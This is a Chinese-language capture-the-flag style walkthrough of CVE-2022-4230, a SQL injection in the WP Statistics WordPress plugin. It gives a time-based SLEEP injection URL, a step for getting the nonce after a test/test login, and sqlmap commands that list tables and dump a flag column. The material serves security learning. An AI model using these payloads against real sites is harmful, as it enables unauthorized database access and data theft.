CVE-2022-4230

漏洞介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下，具有管理选项功能 (admin+) 的用户可以使用受影响的功能，但是该插件有一个设置允许低权限用户也可以访问它

知识补充

WordPress是一种CMS系统，在 WordPress 中，所有提交表单的数据都应包含一个 _wpnonce 字段，以防止未经授权的表单提交。Wordpress自己重写了路由规则，通过/wp-json/开头对内部的插件，主题等等进行访问，通过REST API来访问，每次都给发送一个_wpnonce来进行认证

概念验证

以具有查看 WP 统计权限的用户身份登录，并通过 https://example.com/wp-admin/admin-ajax.php?action=rest-nonce 获取一个 nonce，然后在以下 URL 中使用它，该 URL 将延迟 5 秒

里面的nonce需要通过返回的随机数值替换

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

漏洞分析

https://www.cnblogs.com/F12-blog/p/18170169

开始实验

打开靶场空白一片

想想可以访问/wp-admin/admin-ajax.php?action=rest-nonce 来获得nonce，访问试试

good,回显个0，说明可能存在其他条件限制返回nonce，扫一扫

存在一个/readme.html，访问看看

存在一个登录界面，尝试登录

用户/密码：test/test

再次尝试 /wp-admin/admin-ajax.php?action=rest-nonce

成功返回随机数，修改nonce

访问

/wp-json/wp-statistics/v2/metabox?_wpnonce=4d916dc27a&name=words&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)-- HsBR

抓包，使用sqlmap开始注入

查询当前数据库

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch --current-db

 

爆表

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch -D wordpress --tables

查询flag表后，发现flag字段，查询flag字段

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt  -D wordpress -T flag -C flag --dump